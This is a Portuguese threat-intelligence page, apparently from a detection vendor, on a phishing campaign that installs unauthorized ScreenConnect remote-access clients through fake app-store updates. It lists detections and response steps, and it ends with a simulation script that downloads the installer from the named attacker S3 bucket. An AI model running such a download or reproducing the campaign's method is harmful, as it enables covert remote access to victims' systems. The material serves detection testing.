SOC Prime Bias: Alto

11 Aug 2026 06:17 UTC

Disseminação em Larga Escala do ScreenConnect por meio de Phishing Temático da App Store

Author Photo
SOC Prime Team linkedin icon Seguir
Disseminação em Larga Escala do ScreenConnect por meio de Phishing Temático da App Store
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Uma campanha de phishing em larga escala está utilizando técnicas avançadas de engenharia social para implantar clientes ConnectWise ScreenConnect não autorizados. Os atacantes se passam por serviços confiáveis, como a Microsoft Store, a Apple App Store e o Google Meet, através de conteúdo dinâmico da web e prompts de atualização fraudulentos. Uma vez instalado, o software RMM dá aos agentes de ameaça acesso remoto persistente aos sistemas comprometidos.

Investigação

A equipe LevelBlue OpsCTI descobriu a campanha através da análise de uma estrutura de phishing de atualização falsa e infraestrutura reutilizada. Os pesquisadores identificaram estruturas de diretório consistentes, hashes de recursos HTTP recorrentes e scripts assistidos por IA usados para perfilar potenciais vítimas. A investigação também revelou abuso das APIs do Telegram Bot para telemetria em tempo real e relatórios de infecção.

Mitigação

As organizações devem priorizar a detecção de software RMM não autorizado e monitorar downloads executáveis de serviços de nuvem pública desconhecidos, como Amazon S3 ou Cloudflare R2. Recomenda-se também controlar a identificação de personificação de marcas e tráfego de API de Bot do Telegram não autorizado. Revisões regulares de inventário de endpoints podem ajudar a descobrir instalações clandestinas do ScreenConnect e comprometimentos existentes.

Resposta

Se houver suspeita de comprometimento, os sistemas afetados devem ser isolados imediatamente e quaisquer clientes ScreenConnect comunicando-se com instâncias de relé não autorizadas devem ser investigados. Logs de rede devem ser revisados em busca de conexões suspeitas com domínios de phishing conhecidos ou pontos de extremidade de armazenamento em nuvem pública. Os respondedores também devem examinar processos iniciados por msiexec.exe ou PowerShell que baixam arquivos de fontes externas.

Fluxo de Ataque

Detecções

Possibilidade de Execução Através de Linhas de Comando PowerShell Ocultas (via cmdline)

Equipe SOC Prime
10 Ago 2026

Chamar Métodos .NET Suspeitos do Powershell (via powershell)

Equipe SOC Prime
10 Ago 2026

Possível Execução de Arquivos pelo Msiexec em Diretório Incomum (via cmdline)

Equipe SOC Prime
10 Ago 2026

Software Alternativo de Acesso/ Gestão Remota (via process_creation)

Equipe SOC Prime
10 Ago 2026

Possível Abuso de Domínio de Desenvolvimento da Cloudflare (via dns)

Equipe SOC Prime
10 Ago 2026

Comando e Controle Suspeitos por Solicitação DNS de Domínio de Alto Nível (TLD) Incomum (via dns)

Equipe SOC Prime
10 Ago 2026

IOCs (HashSha256) para detectar: Além de ‘Atualizações Falsas’: De Phishing Temático de Loja de Aplicativos à Distribuição em Larga Escala do ScreenConnect

Regras de IA do SOC Prime
10 Ago 2026

IOCs (SourceIP) para detectar: Além de ‘Atualizações Falsas’: De Phishing Temático de Loja de Aplicativos à Distribuição em Larga Escala do ScreenConnect

Regras de IA do SOC Prime
10 Ago 2026

IOCs (DestinationIP) para detectar: Além de ‘Atualizações Falsas’: De Phishing Temático de Loja de Aplicativos à Distribuição em Larga Escala do ScreenConnect

Regras de IA do SOC Prime
10 Ago 2026

Execução de Instalação Não Autorizada do ScreenConnect via Phishing [Criação de Processo no Windows]

Regras de IA do SOC Prime
10 Ago 2026

Detectar Download do Instalador ScreenConnect de Buckets S3 Suspeitos [AWS Cloudtrail]

Regras de IA do SOC Prime
10 Ago 2026

Execução de Simulação

Pré-requisito: A verificação de Telemetria e Linha Base deve ter sido aprovada.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar a gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa e Comandos de Ataque: Um atacante estabeleceu uma campanha de phishing. Para evitar detecção por antivírus baseado em arquivo, eles hospedam uma ferramenta legítima de acesso remoto (ScreenConnect) em um bucket AWS S3 público que imita a distribuição de software legítimo. O atacante instrui uma vítima a baixar o instalador. Esta ação aciona um evento GetObject na AWS CloudTrail, visando o bucket malicioso específico eobtdk.s3.us-east-2.amazonaws.com e o nome do arquivo específico ScreenConnect.ClientSetup.msi.

  • Script de Teste de Regressão: [Note: Since we cannot interact with real malicious buckets, this script simulates the request que geraria a entrada no log caso o bucket existisse.

    #!/bin/bash
    # Script de simulação para acionar a regra de detecção do CloudTrail
    # Isso imita a chamada de API que um adversário faria para baixar a ferramenta
    
    echo "[+] Iniciando Simulação: Baixando ScreenConnect de S3 Malicioso..."
    
    # Usamos a CLI da AWS para tentar uma solicitação GET.
    # Mesmo se o bucket não existir, a tentativa de 'solicitação' gera o evento CloudTrail
    # em um ambiente real onde o bucket está configurado.
    
    aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2
    
    echo "[+] Comando de simulação enviado. Verifique o CloudTrail para eventos GetObject visando 'eobtdk.s3.us-east-2.amazonaws.com'."
  • Comandos de Limpeza:

    # Remova quaisquer arquivos baixados durante a simulação
    rm -f ScreenConnect.ClientSetup.msi